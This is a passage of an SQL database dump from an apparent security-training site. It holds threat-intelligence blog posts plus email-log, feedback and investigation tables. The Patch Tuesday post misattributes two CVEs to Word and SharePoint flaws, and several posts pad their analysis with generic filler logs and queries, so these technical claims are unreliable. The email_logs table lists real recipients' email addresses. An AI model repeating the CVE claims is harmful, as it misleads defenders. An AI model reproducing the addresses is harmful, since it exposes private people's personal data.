Deploy to the dashboard and investigate the \"Qualcomm Kernel Compromise\" alert to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n- **T1068: Exploitation for Privilege Escalation** - Common to both Qualcomm and iOS chains.\n- **T1020: Automated Exfiltration** - Relevant to the Vibe-Coded malware.\n- **T1059.001: Command and Scripting Interpreter: PowerShell** - Often used in the initial phases of exploit chains.\n\n', 'This week\'s cyber recap: Dissecting the Qualcomm 0-Day, iOS exploit chains, AirSnitch, and Vibe-Coded malware. Essential insights for cybersecurity defense.', 'http://infoseclabs.io/uploads/1773151705593-863339217.png', NULL, 1, 'published', '2026-03-09 19:00:00', '2026-03-10 17:08:27', 'Cybersecurity News', '⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware', 'This week\'s cyber recap: Dissecting the Qualcomm 0-Day, iOS exploit chains, AirSnitch, and Vibe-Coded malware. Essential insights for cybersecurity defense.', '⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware'),
(186, 'Microsoft Patches 84 Flaws in March Patch Tuesday, Including Two Public Zero-Days', 'microsoft-patches-84-flaws-in-march-patch-tuesday-including-two-public-zero-days-9341', '# Executive Summary\n\nIn a critical turn of events, Microsoft has patched 84 vulnerabilities this March, highlighting the urgency and breadth of the cyber threats we face. Two publicly known zero-days make this update not just routine, but a mandatory defense maneuver for anyone in the cyber battlefield.\n\n## The Deep Dive: Technical Analysis\n\nAmong the 84 vulnerabilities patched by Microsoft, the spotlight shines brightest on two publicly disclosed zero-days: CVE-2023-21823 and CVE-2023-23397. Both present an alarming potential for attackers to exploit widely used software.\n\n### CVE-2023-21823\n\nCVE-2023-21823 is a Remote Code Execution (RCE) flaw affecting Microsoft Word. The vulnerability allows an attacker to execute arbitrary code merely by convincing a user to open a specially crafted file. This method of attack is both sophisticated and stealthy, leveraging trusted file types to bypass user skepticism.\n\n### CVE-2023-23397\n\nCVE-2023-23397, on the other hand, is a Cross-Site Scripting (XSS) vulnerability in Microsoft SharePoint. 
By exploiting this, an attacker could potentially perform actions on behalf of users and steal confidential information from unsuspecting victims.\n\n## 🛡️ SOC Analyst Actions: The \"Blue Team\" Playbook\n\n### Detection Opportunities\n\n- **PowerShell Logs**: Look for unusual execution patterns or scripts that could indicate exploitation attempts of the Microsoft Word vulnerability.\n- **Web Server Logs**: Monitor for anomalous requests that might suggest exploitation attempts against SharePoint.\n\n### Triage Steps\n\n- Immediately isolate suspected infected systems.\n- Review and analyze logs for signs of exploitation or lateral movements.\n- Update affected systems with the latest patches from Microsoft, prioritizing critical assets.\n\n## 🎓 Student Corner: The \"Why\" & \"How\"\n\n### Remote Code Execution (RCE)\n\nRemote Code Execution occurs when an attacker can run arbitrary commands on another computer, typically exploiting vulnerabilities in software or systems. Understanding RCE helps in identifying how attackers can gain control over systems remotely, a critical knowledge area in cyber defense.\n\n### Interview Insight\n\nGrasping the concept and defense mechanisms against RCE can dramatically showcase your technical prowess and problem-solving skills in cybersecurity interviews, making you a desirable candidate for roles that require acute threat detection and response capabilities.\n\n## 🚀 Simulation Brief: Call to Action\n\nWe have replicated these attack vectors in the https://infoseclabs.io range. 
Deploy to the dashboard and investigate **\"CVE-2023-21823 Exploit Attempt\"** and **\"CVE-2023-23397 XSS Trigger\"** to test your skills against these TTPs.\n\n## MITRE ATT&CK Mapping\n\n- **T1203: Exploitation for Client Execution** - For the Microsoft Word RCE.\n- **T1059.001: PowerShell** - Often used in post-exploitation phases of RCE attacks.\n- **T1190: Exploit Public-Facing Application** - Relevant for the SharePoint XSS vulnerability.\n', 'Microsoft\'s March Patch Tuesday addresses 84 vulnerabilities, including two critical zero-days. Learn the implications for cybersecurity defenses.', 'http://infoseclabs.io/uploads/1773411894113-969494382.jpg', NULL, 1, 'published', '2026-03-12 18:15:00', '2026-03-13 17:25:06', 'Information Security', 'Microsoft Patches 84 Flaws in March Patch Tuesday, Including Two Public Zero-Days', 'Microsoft\'s March Patch Tuesday addresses 84 vulnerabilities, including two critical zero-days. Learn the implications for cybersecurity defenses.', 'Microsoft Patches 84 Flaws in March Patch Tuesday, Including Two Public Zero-Days'),
(187, 'The Dawn of AI-Driven Cybersecurity: A Brave New World', 'the-dawn-of-ai-driven-cybersecurity-a-brave-new-world', '# The Tectonic Shift in Cybersecurity: The Role of AI\n\nThe landscape of cybersecurity is undergoing a tectonic shift, propelled by the relentless advance of Artificial Intelligence (AI). We are no longer talking about theoretical possibilities; AI is here, it\'s capable, and it\'s redefining how we think about vulnerability research, threat detection, and incident response. This isn\'t just a gradual evolution; it\'s a revolutionary leap that demands our immediate attention and adaptation.\n\n## The Evolving Role of Human Experts\n\nFor decades, the core tenet of cybersecurity has been the human expert—the skilled researcher painstakingly combing through lines of code, the seasoned analyst identifying patterns in vast datasets, the defensive engineer building increasingly complex walls. AI is changing this fundamental equation. We are transitioning from a model reliant solely on human ingenuity to one powered by augmented intelligence, where AI models act as force multipliers, and potentially, as autonomous agents.\n\n## A Glimpse into the Future: The Firefox Collaboration\n\nA powerful illustration of this shift is the recent collaboration between Anthropic and Mozilla, where the AI model Claude Opus 4.6 was used to identify vulnerabilities in the Firefox web browser. The results were startling. In just two weeks, Claude discovered 22 vulnerabilities, 14 of which were classified as high-severity by Mozilla. To put this in perspective, this single AI-driven effort accounted for nearly a fifth of all high-severity Firefox vulnerabilities fixed in 2025. The speed and efficiency were unprecedented. Claude was able to scan nearly 6,000 C++ files and generate 112 unique reports in a fraction of the time it would have taken a human team.\n\nThis experiment didn\'t just stop at finding bugs. 
The researchers also tasked Claude with developing crude exploits for the discovered vulnerabilities. While successful in only a few instances and operating within a simplified test environment, the fact that an AI could generate even a basic exploit is a stark reminder of the potential dual-use nature of this technology.\n\n## The Changing Landscape: From Assistant to Agent\n\nThe significance of the Firefox collaboration extends far beyond the specific bugs found. It signifies a fundamental change in the role of AI in cybersecurity. We are moving beyond AI as a simple tool for augmenting human capabilities to AI as an active, and increasingly autonomous, participant in security processes.\n\n### Accelerated Vulnerability Research\n\nAI models can now independently identify high-severity vulnerabilities in complex software at a pace and scale previously unimagined. This means that zero-day vulnerabilities, the holy grail for attackers, could be discovered at a significantly faster rate.\n\n### Automated Exploit Development\n\nWhile still in its early stages, the potential for AI to automate the creation of exploits is a growing concern. This could lower the barrier to entry for sophisticated cyberattacks and dramatically increase the volume of threats.\n\n### Intelligent Patching and Remediation\n\nOn the defensive side, AI can be used to not only find vulnerabilities but also to propose and even validate patches. This \"patching agent\" approach could significantly speed up the time-to-remediation, reducing the window of opportunity for attackers.\n\n## What Does This Mean for the Cybersecurity Professional?\n\nThe rise of AI in cybersecurity presents both immense opportunities and significant challenges. 
It\'s a double-edged sword that will reshape the industry and require a fundamental rethink of our strategies and skill sets.\n\n### The Rise of the Cybersecurity-AI Hybrid Professional\n\nThe cybersecurity professional of the future will need to be well-versed in both security principles and AI methodologies. The ability to work alongside, manage, and even train AI models will become a critical skill.\n\n### Focus on High-Level Strategy and Judgment\n\nAs AI automates many mundane and repetitive tasks, the human role will shift towards high-level strategy, complex problem-solving, ethical considerations, and exercising judgment in critical situations where AI may be uncertain or biased.\n\n### The Importance of \"Defense in Depth\"\n\nWhile AI will enhance our ability to detect and fix vulnerabilities, it will also enable attackers. This underscores the continued importance of a robust \"defense in depth\" strategy, combining multiple layers of security controls, including network segmentation, access management, and intrusion detection systems.\n\n### The Ethical Dimensions of AI in Cybersecurity\n\nThe dual-use nature of AI in cybersecurity raises profound ethical questions. How do we ensure that AI is used for good and not for harm? Who is responsible when AI makes a critical error? These are complex issues that require careful consideration and global cooperation.\n\n## Preparing for the AI-Powered Future\n\nThe future of cybersecurity is inextricably linked with the future of AI. To thrive in this new era, we must embrace the opportunities that AI presents while mitigating the risks.\n\n### Invest in AI Education and Training\n\nUpskilling the cybersecurity workforce in AI will be essential. 
This includes understanding the principles of machine learning, the capabilities and limitations of AI models, and the ethical considerations of their use.\n\n### Develop AI-Specific Security Tools and Techniques\n\nWe need to develop new tools and techniques to secure AI systems themselves and to detect and counter AI-powered attacks. This includes techniques for monitoring AI models for bias, adversarial attacks, and unauthorized access.\n\n### Foster Collaboration and Knowledge Sharing\n\nThe challenges posed by AI in cybersecurity are too big for any single organization to solve alone. We need to foster a culture of collaboration and knowledge sharing between academia, industry, and government.\n\n### Establish Clear Ethical Guidelines and Regulations\n\nWe need to establish clear ethical guidelines and regulations for the development and use of AI in cybersecurity. This includes principles for transparency, accountability, and the prevention of misuse.\n\nThe dawn of AI-driven cybersecurity is upon us. It\'s a brave new world, filled with both peril and promise. By embracing the transformative power of AI and by proactively addressing the challenges it presents, we can build a more secure and resilient digital future for all. The time to act is now.', '', 'http://infoseclabs.io/uploads/1773412765578-833363723.jpg', 'AI analyzing cybersecurity threats and vulnerabilities', 1, 'published', '2026-03-13 10:35:00', '2026-03-13 17:39:34', 'Information Security', 'AI-Driven Cybersecurity: A Brave New Era', 'Explore how AI revolutionizes cybersecurity, reshaping vulnerability detection and response strategies.', 'AI Cybersecurity'),
(191, 'Supply Chain Risk: Why Vendors are the New Zero-Day', 'supply-chain-risk-why-vendors-are-the-new-zero-day-1055', '# Supply Chain Risk: Why Vendors are the New Zero-Day\n\n## 1. **Executive Briefing**\n\n### Strategic Overview\n\nIn the evolving landscape of cybersecurity threats, a shift towards exploiting third-party dependencies and cloud service providers has marked a significant change in how threat actors approach their targets. The reliance on external services and infrastructures not only increases the attack surface but also introduces new vulnerabilities, often akin to zero-day exploits due to their unpredicted nature and complexity in mitigation.\n\n**Actors**: While specific threat actors are not identified in the current dataset, the nature of these attacks typically involves sophisticated cybercriminals or state-sponsored groups looking to exploit supply chain vulnerabilities to infiltrate multiple targets indirectly.\n\n**Impact**: The impact of such breaches is profound, affecting multiple organizations simultaneously through a single compromised vendor. This can lead to widespread data breaches, operational disruptions, and significant financial losses.\n\n**Exploit**: Attack vectors include but are not limited to, compromised software updates, malicious third-party components, and exploited vulnerabilities within cloud services.\n\n## 2. **Technical Deep Dive**\n\n### Chain of Execution\n\nSupply chain attacks involve several stages. Initially, attackers identify a vulnerable point in the supply chain network—often a lesser-secured vendor or third-party service. They then infiltrate these systems, often through phishing, exploiting known vulnerabilities, or inserting malicious code into software updates. 
Once inside, they use the compromised network as a launchpad to gain access to higher-value targets.\n\n#### Payloads\n\nNo specific payloads are identified in the current data, but typically, these could include ransomware, spyware, or other malicious tools intended to steal data, disrupt services, or gain prolonged access to the victim\'s environment.\n\n#### Realistic Log/Terminal Examples\n\n```bash\n# Potential log indicating an unusual software update request (simulated example)\nJul 10 12:34:56 update-server.example.com [WARNING]: Received unexpected request for package update from unauthorized IP 192.168.1.100\n```\n\n## 3. **🛡️ Detection & Response**\n\n### Specific Log Sources\n\n- **Web Server Logs**: To monitor unusual requests to internal systems.\n- **Authentication Logs**: To detect anomalous access patterns.\n- **Network Traffic Logs**: To identify spikes in data exfiltration attempts.\n\n### P1-P3 Severity\n\n- **P1**: Detection of unauthorized changes to software packages or service configurations.\n- **P2**: Alerts on new, unexpected external connections from third-party providers.\n- **P3**: Warnings about unauthorized access attempts to cloud service management interfaces.\n\n### Technical Hunt Query\n\n```sql\nSELECT source_ip, COUNT(*) as request_count\nFROM http_logs\nWHERE url LIKE \'%/update%\'\nGROUP BY source_ip\nHAVING request_count > 1000\nORDER BY request_count DESC;\n```\n\n## 4. **🎓 Academy Focus**\n\n### Career Impact\n\nUnderstanding and mitigating supply chain risks is becoming a crucial skill in cybersecurity, opening roles such as Supply Chain Security Analyst and Risk Management Specialist.\n\n### Technical Glossary\n\n- **Third-Party Dependencies**: External components or services integrated into the primary system.\n- **Cloud Service Providers**: Companies that offer networked computer resources, typically over the internet.\n\n## 5. 
**🚀 Lab Integration**\n\nAt InfoSecLabs, our proposed lab, **Operation Kaseya Cascade**, simulates a real-world SOC scenario focusing on supply chain compromise. This lab challenges participants to detect and mitigate a supply chain attack, providing hands-on experience with the complexities involved in such threats.\n\n## 6. **MITRE ATT&CK® Mapping**\n\n- **T1195 - Supply Chain Compromise**: This technique involves manipulating products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nIn conclusion, the emerging trend of targeting vendors and third-party services in cyber-attacks magnifies the need for robust security measures at all levels of the supply chain. By understanding the mechanisms of such attacks and integrating sophisticated detection and response strategies, organizations can better shield themselves against these indirect yet highly destructive threats.', 'Cyberattacks are increasingly targeting third-party dependencies and cloud service providers.', 'http://infoseclabs.io/uploads/1773501523863-168607363.jpg', NULL, 1, 'published', '2026-03-14 04:14:00', '2026-03-14 18:19:11', 'Threat Intelligence', 'Understanding Supply Chain Cyber Risks: Zero-Day Vendor Threats', 'Explore how sophisticated cyber threats exploit vendors in supply chains, posing risks similar to zero-day vulnerabilities.', 'supply chain cyber risks'),
(193, 'Microsoft releases Windows 11 OOB hotpatch to fix RRAS RCE flaw', 'microsoft-releases-windows-11-oob-hotpatch-to-fix-rras-rce-flaw-0053', '# Threat Intelligence Report: Microsoft Windows 11 OOB Hotpatch for RRAS RCE Flaw\n\n## Executive Briefing\n\nIn a recent development, Microsoft has issued an urgent out-of-band (OOB) update specifically targeting a Remote Code Execution (RCE) vulnerability affecting Windows 11 Enterprise systems that utilize hotpatching as a method for system updating. This proactive response by Microsoft underscores the critical nature of the flaw, which could allow unauthorized actors to execute malicious code remotely on affected systems.\n\n### Strategic Overview\n- **Actor**: While no specific threat actors have been identified exploiting this flaw, the nature of the vulnerability makes it a lucrative target for cybercriminals and state-sponsored entities aiming to compromise enterprise-level systems.\n- **Impact**: The exploitation of this vulnerability could lead to unauthorized access, data theft, and potential full system control, thereby compromising the integrity and confidentiality of enterprise operations and sensitive data.\n- **Exploit**: The vulnerability resides within the mechanism that handles hotpatch updates, a less common but critical component of Windows 11 Enterprise update management.\n\n## Technical Deep Dive\n\nThe flaw in question arises from a misconfiguration and insufficient security checks within the Windows 11 Enterprise\'s RRAS (Routing and Remote Access Service) during the hotpatch update process. This oversight provides a potential entry point for attackers.\n\n### Chain of Execution\n1. **Initial Access**: The attacker discovers an exposed endpoint receiving hotpatch updates.\n2. **Exploitation**: Utilizing crafted packets, the attacker exploits the RCE flaw within the RRAS.\n3. 
**Establishment**: Post-exploitation, the attacker establishes persistence within the network to maintain access even after the initial security breach is mitigated.\n\n### Payloads\nPotential payloads could include but are not limited to, malware, ransomware, or spyware, depending on the attacker\'s objectives.\n\n### Example Log Entry\n```plaintext\nERROR: Failed integrity check for hotpatch ID: HP09112021_11, Source IP: [Attacker IP]\n```\n\n## 🛡️ Detection & Response\n\n### Log Sources\n- **Windows Event Logs**: Monitor for unusual access patterns or failed update logs.\n- **Network Traffic**: Unusual outbound connections or data payloads from enterprise devices.\n- **Antivirus Alerts**: Alerts related to the execution of unknown or unauthorized binaries.\n\n### Severity Levels\n- **P1**: Active exploitation of the RRAS RCE flaw.\n- **P2**: Indications of compromise related to the RRAS subsystem.\n- **P3**: General alerts on failed hotpatch installations.\n\n### Technical Hunt Query\n```sql\nSELECT * FROM logs WHERE event_type = \'update_failure\' AND error_code = \'integrity_check_failed\' AND source_ip != \'trusted_hotpatch_server_ip\'\n```\n\n## 🎓 Academy Focus\n\n### Career Impact\nUnderstanding and mitigating such vulnerabilities are crucial for security professionals specializing in enterprise security and patch management systems.\n\n### Technical Glossary\n- **Hotpatch**: An update mechanism that allows patches to be applied without the need to reboot the system.\n- **RRAS**: Routing and Remote Access Service, a networking software component of Microsoft Windows Server operating systems.\n\n## 🚀 Lab Integration\n\nLinking to InfoSecLabs training, participants can engage with our \"Windows Patch Management and Security\" lab to gain hands-on experience in managing and securing enterprise environments against similar vulnerabilities.\n\n## MITRE ATT&CK® Mapping\n\nWhile specific MITRE ATT&CK® techniques related to this vulnerability have not been 
identified in the provided data, general techniques such as T1068 (Exploitation for Privilege Escalation) and T1547 (Persistence) could be considered relevant for understanding the broader implications of such a flaw.\n\n---\n\nThis report serves as a comprehensive guide for understanding, detecting, and mitigating the newly identified RCE vulnerability in Windows 11 Enterprise\'s hotpatch system. InfoSecLabs remains committed to providing up-to-date and thorough analysis to protect your digital assets effectively.', 'Microsoft released an out-of-band update for Windows 11 Enterprise to fix security vulnerabilities related to the specialized hotpatch update process.', 'http://infoseclabs.io/uploads/1773544334133-77869219.jpg', NULL, 1, 'published', '2026-03-14 23:02:00', '2026-03-15 06:12:17', 'Threat Intelligence', 'Microsoft Windows 11 OOB Update Fixes Critical RRAS RCE Flaw', 'Learn how the latest Windows 11 OOB hotpatch addresses a critical RRAS RCE vulnerability threatening enterprise systems.', 'Windows 11 RRAS RCE hotpatch'),
(194, 'INTERPOL Dismantles 45,000 Malicious IPs, Arrests 94 in Global Cybercrime', 'interpol-dismantles-45-000-malicious-ips-arrests-94-in-global-cybercrime-4920', '# INTERPOL Dismantles 45,000 Malicious IPs, Arrests 94 in Global Cybercrime Operation\n\n## Executive Briefing\n\nIn a significant international law enforcement effort, INTERPOL has successfully dismantled a network of 45,000 IP addresses and servers implicated in widespread phishing, malware, and ransomware operations. This operation, spanning 72 countries, underscores the pervasive threat posed by cybercriminals globally and highlights the critical need for coordinated actions against these illicit activities.\n\n### Actors and Impact\n\nThe actors involved in this network were engaged in deploying malicious software and conducting phishing campaigns to infiltrate personal and organizational systems. The scale of this operation—targeting 45,000 IPs—indicates a highly organized and extensive criminal infrastructure. The arrests of 94 individuals are pivotal in disrupting ongoing cybercrime activities, potentially preventing future attacks.\n\n### Exploitation Techniques\n\nThe exploitation techniques primarily involved the use of compromised IP addresses and servers to deploy and manage ransomware and malware payloads. These techniques were primarily aimed at stealing personal information, encrypting organizational data for ransom, and executing fraudulent transactions.\n\n## Technical Deep Dive\n\n### Overview of Malicious Infrastructure\n\nThe malicious network comprised numerous servers and IP addresses spread across various geographical locations. These were primarily used for:\n\n- **Phishing Operations**: Crafting and disseminating deceptive emails to harvest user credentials.\n- **Malware Distribution**: Hosting and distribution points for harmful software.\n- **Ransomware Attacks**: Facilitating command and control (C2) communications and data encryption tasks.\n\n### Chain of Execution\n\n1. 
**Initial Compromise**: Typically via phishing emails or exploiting public-facing applications.\n2. **Establishment of Foothold**: Deployment of malware payloads to create backdoors.\n3. **Privilege Escalation and Lateral Movement**: Utilizing exploits and stolen credentials to gain broader access within networks.\n4. **Data Exfiltration and Ransomware Deployment**: Critical data is either exfiltrated or encrypted for ransom demands.\n\n### Example Log Entry\n\n```plaintext\nSRC IP: [Malicious IP]\nDST IP: [Victim IP]\nPayload: [Malware/Ransomware Signature]\nAction: Connection Established\n```\n\n## 🛡️ Detection & Response\n\n### Log Sources\n\n- **Firewall Logs**: To identify unauthorized connection attempts.\n- **IDS/IPS Logs**: To detect signatures of known threats and anomalous network patterns.\n- **System Logs**: To monitor unauthorized access and system changes.\n\n### Incident Severity\n\n- **P1 (Critical)**: Active ransomware encryption in progress.\n- **P2 (High)**: Detected malware communication to C2 servers.\n- **P3 (Moderate)**: Phishing attempts detected.\n\n### Technical Hunt Query\n\n```sql\nSELECT * FROM network_logs\nWHERE src_ip IN (SELECT malicious_ip FROM threat_intel)\nAND event_type = \'connection_attempt\'\nAND action = \'blocked\';\n```\n\n## 🎓 Academy Focus\n\n### Career Impact\n\nUnderstanding and mitigating such large-scale cyber threats are essential for cybersecurity professionals. 
Expertise in network forensics, malware analysis, and incident response are particularly relevant.\n\n### Technical Glossary\n\n- **IP Address**: A unique string of numbers separated by periods that identifies each computer using the Internet Protocol to communicate over a network.\n- **Phishing**: The fraudulent practice of sending emails purporting to be from reputable companies to induce individuals to reveal personal information.\n- **Ransomware**: A type of malicious software designed to block access to a computer system until a sum of money is paid.\n\n## 🚀 Lab Integration\n\n### Related Training at InfoSecLabs\n\n1. **Operation Radiant Horizon**: Simulates the detection and mitigation of a multi-national phishing scam.\n2. **Operation Dragon Breath**: Focuses on identifying and responding to malware threats.\n3. **Operation Phantom Ballot**: Engages trainees in a scenario involving election security and information integrity.\n\n## MITRE ATT&CK® Mapping\n\nDue to the absence of specific techniques in the extracted data, a precise mapping is not feasible. However, typical mappings could involve:\n\n- **T1566 (Phishing)**: For the initial compromise via deceptive emails.\n- **T1486 (Data Encrypted for Impact)**: Relating to ransomware activities.\n\nIn conclusion, the successful takedown by INTERPOL represents a significant blow to cybercriminal operations worldwide. 
For cybersecurity professionals at InfoSecLabs and beyond, this operation serves as a critical case study in the effectiveness of international cooperation and the ongoing need for advanced cybersecurity measures and training.\n', 'INTERPOL took down 45,000 malicious IP addresses and servers related to phishing, malware, and ransomware activities across 72 countries.', 'http://infoseclabs.io/uploads/1773586944413-601928429.jpg', NULL, 1, 'published', '2026-03-14 19:00:00', '2026-03-15 18:02:38', 'Threat Intelligence', 'INTERPOL\'s Global Crackdown on 45K Cybercrime IPs & 94 Arrests', 'Discover how INTERPOL\'s landmark cybercrime operation dismantled 45,000 IPs & led to 94 arrests, setting a new precedent in cybersecurity.', 'INTERPOL cybercrime operation');

-- --------------------------------------------------------

--
-- Table structure for table `email_logs`
--

-- Delivery log for outbound e-mail: one row per message attempt, with the
-- outcome in `status` / `error_message`.
-- `recipient_email` is personal data and the rows dumped below hold real
-- addresses; exclude or mask this table before a dump leaves the trusted
-- environment.
-- No PRIMARY KEY, index or AUTO_INCREMENT is declared in this statement; in a
-- phpMyAdmin export those are normally added by ALTER TABLE statements later
-- in the file -- confirm before relying on `id` being unique.
CREATE TABLE `email_logs` (
  `id` int(11) NOT NULL,
  `recipient_email` varchar(255) NOT NULL,                   -- personal data
  `subject` varchar(255) DEFAULT NULL,                       -- rendered subject line
  `status` varchar(50) DEFAULT NULL,                         -- free-form; every dumped row uses 'sent'
  `error_message` text DEFAULT NULL,                         -- presumably the transport error when a send fails; NULL in every dumped row
  `user_id` int(11) DEFAULT NULL,                            -- platform account; nullable, and NULL in every dumped row
  `sent_at` timestamp NOT NULL DEFAULT current_timestamp()   -- set at insert time
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `email_logs`
--

-- Data for `email_logs`. Every row has status 'sent', error_message NULL and
-- user_id NULL, so the dumped log cannot be joined back to an account; the
-- recipient address is the only identifier present. The addresses are real
-- recipients (personal data): mask or drop this table before sharing the dump.
INSERT INTO `email_logs` (`id`, `recipient_email`, `subject`, `status`, `error_message`, `user_id`, `sent_at`) VALUES
(1, 'halilbaris@gmail.com', 'Test Render: weekly_report_body', 'sent', NULL, NULL, '2026-03-15 16:30:47'),
(2, '2301301141.nitin@geetauniversity.edu.in', 'New Mission: Malware Detected - Suspicious Process Execution', 'sent', NULL, NULL, '2026-03-15 17:12:52'),
(3, 'akarunkumar348@gmail.com', 'Subscription Upgraded', 'sent', NULL, NULL, '2026-03-15 17:20:16'),
(4, 'akarunkumar348@gmail.com', 'New Mission: Suspicious PowerShell Script Execution', 'sent', NULL, NULL, '2026-03-15 17:21:45'),
(5, 'villarca@outlook.com', 'Verify your email address', 'sent', NULL, NULL, '2026-03-15 17:28:08'),
(6, 'karthikandatom@gmail.com', 'Verify your email address', 'sent', NULL, NULL, '2026-03-15 17:51:16'),
(7, '2301301141.nitin@geetauniversity.edu.in', 'New Mission: Phishing Attempt Detected - Malicious Email Link', 'sent', NULL, NULL, '2026-03-15 18:05:12'),
(8, '2301301141.nitin@geetauniversity.edu.in', 'New Mission: Suspicious PowerShell Command Execution Detected', 'sent', NULL, NULL, '2026-03-15 18:14:41'),
(9, 'shantaciak@gmail.com', 'Verify your email address', 'sent', NULL, NULL, '2026-03-15 18:38:43'),
(10, 'emelyanovakt@gmail.com', 'New Mission: Spear Phishing Email Detected', 'sent', NULL, NULL, '2026-03-15 19:11:11'),
-- Rows 11-14: the same promotional message to one address four times within
-- two minutes (21:15:07 to 21:17:06). Looks like a resend/retry path with no
-- duplicate suppression or per-recipient rate limit -- worth checking in the
-- sender, since it also makes the platform look like a spam source.
(11, 'skegeo@yahoo.com', '🚀 Maximize Your Security Training - InfoSecLabs Pro', 'sent', NULL, NULL, '2026-03-15 21:15:07'),
(12, 'skegeo@yahoo.com', '🚀 Maximize Your Security Training - InfoSecLabs Pro', 'sent', NULL, NULL, '2026-03-15 21:15:40'),
(13, 'skegeo@yahoo.com', '🚀 Maximize Your Security Training - InfoSecLabs Pro', 'sent', NULL, NULL, '2026-03-15 21:16:50'),
(14, 'skegeo@yahoo.com', '🚀 Maximize Your Security Training - InfoSecLabs Pro', 'sent', NULL, NULL, '2026-03-15 21:17:06'),
(15, 'hmuhina@wgu.edu', 'New Mission: Spear Phishing Email Detected', 'sent', NULL, NULL, '2026-03-16 01:46:28');

-- --------------------------------------------------------

--
-- Table structure for table `feedbacks`
--

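-- Free-text feedback with an optional numeric grade, keyed by the submitting
-- user. `grade` and `feedback` also exist on `investigations`; which of the
-- two the application writes is not visible in this dump -- confirm.
--
-- Storage: the original export declared this table ENGINE=MyISAM with
-- CHARSET=latin1. Every other table dumped here is InnoDB utf8mb4, and the
-- platform stores emoji and non-Latin text elsewhere (e.g. e-mail subjects),
-- so latin1 would silently mangle such characters in `feedback`, and MyISAM
-- is non-transactional (it ignores the dump's START TRANSACTION/COMMIT and
-- cannot carry foreign keys). No data section follows this table in the
-- dump, so switching engine and charset is lossless for the dumped content.
-- No PRIMARY KEY or AUTO_INCREMENT is declared in this statement; a
-- phpMyAdmin export normally adds them via ALTER TABLE later in the file.
CREATE TABLE `feedbacks` (
  `id` int(11) NOT NULL,
  `user_id` int(11) DEFAULT NULL,                                              -- submitting user; nullable, no FK in this statement
  `grade` int(11) DEFAULT NULL,                                                -- optional numeric grade; range not constrained here
  `feedback` text DEFAULT NULL,                                                -- user-typed free text; treat as untrusted when rendered
  `created_at` datetime DEFAULT current_timestamp(),                           -- datetime (no session time-zone conversion), unlike the timestamp columns on other tables
  `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;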

-- --------------------------------------------------------

--
-- Table structure for table `investigations`
--

-- One row per analyst investigation of an alert (`user_id` x `alert_id`).
-- `executive_summary` holds the analyst's submitted playbook answers as a JSON
-- document (verdict, checked artifacts, selected actions, free-text
-- conclusion, submitted_at); `ai_summary` holds the automated evaluation of
-- that submission, also JSON. The conclusion text inside `executive_summary`
-- is typed by the user: treat it as untrusted wherever it is rendered or
-- passed to the evaluator.
-- No keys or foreign keys appear in this statement; a phpMyAdmin export
-- normally adds them via ALTER TABLE later in the file -- confirm before
-- relying on referential integrity of `user_id` / `alert_id`.
CREATE TABLE `investigations` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,                                                   -- investigating analyst
  `alert_id` int(11) NOT NULL,                                                  -- alert under investigation
  `status` varchar(50) DEFAULT 'investigating',                                 -- free-form; every dumped row is still 'investigating', even after submission
  `grade` int(11) DEFAULT NULL,                                                 -- NULL in every dumped row; also present on `feedbacks`
  `feedback` text DEFAULT NULL,                                                 -- NULL in every dumped row; also present on `feedbacks`
  `executive_summary` text DEFAULT NULL,                                        -- JSON submission; NULL on rows with no submission yet (presumably)
  `ai_summary` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, -- JSON evaluation; utf8mb4_bin longtext is how MariaDB exports a JSON column -- likely declared JSON in the app schema, confirm
  `ai_evaluation_scheduled_at` datetime DEFAULT NULL,                           -- in the dumped rows this is set only where `ai_summary` is still NULL
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `is_reported` tinyint(1) DEFAULT 0,                                           -- user flagged this item (presumably the alert or its evaluation); 0 in every dumped row
  `report_reason` text DEFAULT NULL                                             -- free text accompanying `is_reported`; untrusted
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `investigations`
--

INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(44, 41, 240, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-27T10:33:40.336Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The PowerShell command was identified as potentially malicious due to its encoded nature and execution with high integrity.\",\"missed_items\":[\"Analysis of the decoded command\",\"Summary and conclusion of findings\",\"Action plan or recommendation\"],\"strengths\":\"The analyst has successfully identified the event as suspicious, which is the main takeaway needed in incident response.\"}', NULL, '2025-12-27 10:31:24', '2026-01-02 02:40:31', 0, NULL),
(45, 41, 242, 'investigating', NULL, NULL, NULL, NULL, '2025-12-27 13:50:44', '2025-12-27 10:42:44', '2025-12-27 10:42:44', 0, NULL),
(46, 41, 241, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-27T10:44:02.144Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The analyst should have noted the use of PowerShell with Invoke-Expression to download a script from a questionable URL, indicative of potentially malicious activity.\",\"missed_items\":[\"Detailed analysis or actions taken\",\"Key artifacts such as the URL and file hash\"],\"strengths\":\"Correctly identified the event as a true positive.\"}', NULL, '2025-12-27 10:42:49', '2026-01-02 02:40:31', 0, NULL),
